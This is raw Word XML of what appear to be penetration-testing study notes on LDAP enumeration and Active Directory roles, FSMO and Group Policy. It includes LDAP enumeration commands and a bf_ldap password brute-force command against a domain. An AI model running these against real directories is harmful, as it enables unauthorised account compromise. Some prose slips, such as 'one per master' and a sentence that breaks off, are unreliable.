          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E42C7" w:rsidRPr="003E42C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ldap://</w:t>
      </w:r>
      <w:r w:rsidRPr="003E42C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;target&gt;</w:t>
      </w:r>
      <w:r w:rsidR="003E42C7" w:rsidRPr="003E42C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s base -x</w:t>
      </w:r>
      <w:r w:rsidRPr="003E42C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>linux version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E42C7" w:rsidRDefault="003E42C7" w:rsidP="003E42C7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E42C7" w:rsidRPr="003E42C7" w:rsidRDefault="0071149B" w:rsidP="003E42C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ldapenum.pl –U –E -i &lt;ip</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>u &lt;username&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0071149B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0071149B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0071149B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>d &lt;fqdn&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BFC" w:rsidRDefault="00EB1BFC" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0071149B" w:rsidRDefault="0071149B" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LDAP bruteforce</w:t>
      </w:r>
      <w:r w:rsidR="00344C7D">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (windows 2000)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0071149B" w:rsidRPr="00344C7D" w:rsidRDefault="00344C7D" w:rsidP="00344C7D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00344C7D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">bf_ldap –s &lt;ipaddress&gt; -u &lt;users&gt; -L &lt;passwords&gt;-d &lt;domain&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="002738F4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">E3 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Active Directory</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="002738F4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E3a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Active Directory Roles (Global Catalogue, Master Browser, FSMO)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="008557B5" w:rsidRDefault="0096193A" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Active Directory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096193A" w:rsidRPr="008557B5" w:rsidRDefault="0096193A" w:rsidP="0096193A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Active Directory is a technology created by Microsoft that provides a variety of network services, including:</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Lightweight Directory Access Protocol (LDAP)-like directory services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Kerberos-based authentication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DNS-based naming and other network information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Central location for network administration and delegation of authority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Information security and single sign-on for user access to networked based resources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The ability to scale up or down easily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Central storage location for application data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Synchronization of directory updates amongst several servers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096193A" w:rsidRPr="008557B5" w:rsidRDefault="0096193A" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Using the same database, for use primarily in Windows environments, Active Directory also allows administrators to assign policies, deploy software, and apply critical updates to an organization. Active Directory stores information and settings in a central database. Active Directory networks can vary from a small installation with a few computers, users and printers to tens of thousands of users, many different domains and large server farms spanning many geographical locations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096193A" w:rsidRPr="008557B5" w:rsidRDefault="0096193A" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0096193A" w:rsidRPr="008557B5" w:rsidRDefault="0096193A" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Global Catalogue:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="008557B5" w:rsidRDefault="0096193A" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In a multi-domain forest the Active Directory database becomes partitioned. That is, each domain maintains a list of only those objects that belong in that domain. So, for example, a user created in Domain A would be listed only in Domain A's domain controllers. Global catalogue (GC) servers are used to provide a global listing of all objects in the Forest. The Global catalogue is held on domain controllers configured as global catalogue servers. Global Catalogue servers replicate to themselves all objects from all domains and hence, provide a global listing of objects in the forest. However, in order to minimize replication traffic and to keep the GC's database small, only selected attributes of each object are replicated. Global catalogue runs on TCP port 3268. A global catalogue server must be available or the user cannot logon to the domain unless the user is in the group "Domain Admins". Adding more global catalog servers will make searching the forest faster, but more network bandwidth will be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>required</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for replication between global catalog servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096193A" w:rsidRPr="008557B5" w:rsidRDefault="0096193A" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0096193A" w:rsidRPr="008557B5" w:rsidRDefault="0096193A" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Master Browser:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096193A" w:rsidRPr="008557B5" w:rsidRDefault="0096193A" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The master browser is responsible for collecting host or server announcements, which are sent as datagrams every 12 minutes by each server on the network segment of the master browser. The master browser instructs the potential browsers for each network segment to become backup browsers. The backup browser on a given network segment provides a browse list to the client computers located in the same segment.</w:t>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In a Windows NT domain structure, the primary domain controller (PDC) is always selected as the domain master browser. Only the PDC can be a domain master browser. If a PDC is not present, a domain master browser is not available and you are unable to obtain browse lists from workgroups other than the workgroup you are located in. In Windows 2000 and above the DC </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096193A" w:rsidRPr="008557B5" w:rsidRDefault="0096193A" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0096193A" w:rsidRPr="008557B5" w:rsidRDefault="0096193A" w:rsidP="0096193A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Flexible Single Master Operations (FSMO):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096193A" w:rsidRPr="008557B5" w:rsidRDefault="0096193A" w:rsidP="0096193A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows 2000 Domains work using a multiple master design with restricted master operations on a master domain controller. This was done to distribute the load on domain controllers but there are some operations that can only be done on a single or "master" controller. There are a set of Flexible Single Master Operations (FSMO) which can only be done on a single controller. An administrator determines which operations must be done on the master controller. These operations are all set up on the master controller by default and can be transferred later. FSMO operations types include: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Schema Master - Makes changes to the database schema. Applications may remotely connect to the schema master. </w:t>
      </w:r>
      <w:r w:rsidR="00AA72B2">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> – one per forest</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Domain Naming Master - Adds or removes domains to or from the forest. </w:t>
      </w:r>
      <w:r w:rsidR="00AA72B2">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>– one per master</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PDC Emulator - When Active Directory is in mixed mode, the computer Active Directory is on acts as a Windows NT PDC. The first server that becomes a Windows 2000 domain controller takes the role of PDC em</w:t>
      </w:r>
      <w:r w:rsidR="008557B5" w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ulator by default. Functions pe</w:t>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rformed by the PDC emulator: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User account changes and password changes.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SAM directory replication requests.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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Domain master browser requests.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Authentication requests. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096193A" w:rsidRPr="008557B5" w:rsidRDefault="0096193A" w:rsidP="0096193A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The NTLM protocol is used by the PDC emulator to contact non-Windows 2000 clients and servers for exchange of authentication information. When contacting Windows 2000 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>servers ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Windows 2000 protocol is used.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Relative ID Master (RID Master) - All objects have a Security Identifier (SID) and a domain SID. The RID assigns relative IDs to each domain controller.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Infrastructure Master - Updates group membership information when users from other domains are moved or renamed. If you transfer this function, it should not be transferred to the domain controller that is the global catalogue server. If this is done, the Infrastructure Master will not function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="00FA3D71">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E3b - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Reliance of AD on DNS and LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="008557B5" w:rsidRDefault="000C3041" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AD relies on DNS as its primary locator service</w:t>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="008557B5" w:rsidRDefault="000C3041" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AD uses LDAP as a protocol for its data repository – it would not work without it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="00FA3D71">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E3c - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Group Policy (Local Security Policy)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C3041" w:rsidRPr="008557B5" w:rsidRDefault="000C3041" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Group Policy:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="008557B5" w:rsidRDefault="000C3041" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Group Policy is a feature of the Microsoft Windows NT family of operating systems. Group Policy is a set of rules which control the working environment of user accounts and computer accounts. Group Policy provides the centralized management and configuration of operating systems, applications and users' settings in an Active Directory environment. In other words, Group Policy in part controls what users can and can't do on a computer system.</w:t>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Group Policy can control a target object's registry, NTFS security, audit and security policy, software installation, logon- and logoff-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>scripts,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security filtering is the process of customizing the scope of the Group Policy Object (GPO) by choosing which users and groups the GPO applies to. Group policy can effectively control the local security policies for all computers within a domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C3041" w:rsidRPr="008557B5" w:rsidRDefault="000C3041" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C3041" w:rsidRPr="008557B5" w:rsidRDefault="000C3041" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Local Security Policy:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C3041" w:rsidRPr="008557B5" w:rsidRDefault="000C3041" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Local Security Policy can be used to directly modify account and local policies, public key policies and IP security policies for your local computer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C3041" w:rsidRPr="008557B5" w:rsidRDefault="000C3041" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C3041" w:rsidRPr="008557B5" w:rsidRDefault="000C3041" w:rsidP="000C3041">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Account policies - All security policies are computer-based policies. Account policies are defined on computers, yet they affect how user accounts can interact with the computer or domain. Account </w:t>
      </w:r>
      <w:r w:rsidR="003C35BB" w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>policies contain three subsets:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C3041"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Password policy</w:t>
      </w:r>
      <w:r w:rsidR="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Used for domain or local user accounts. Determines settings for passwords, such as enforcement and lifetimes. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C3041"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Account lockout policy</w:t>
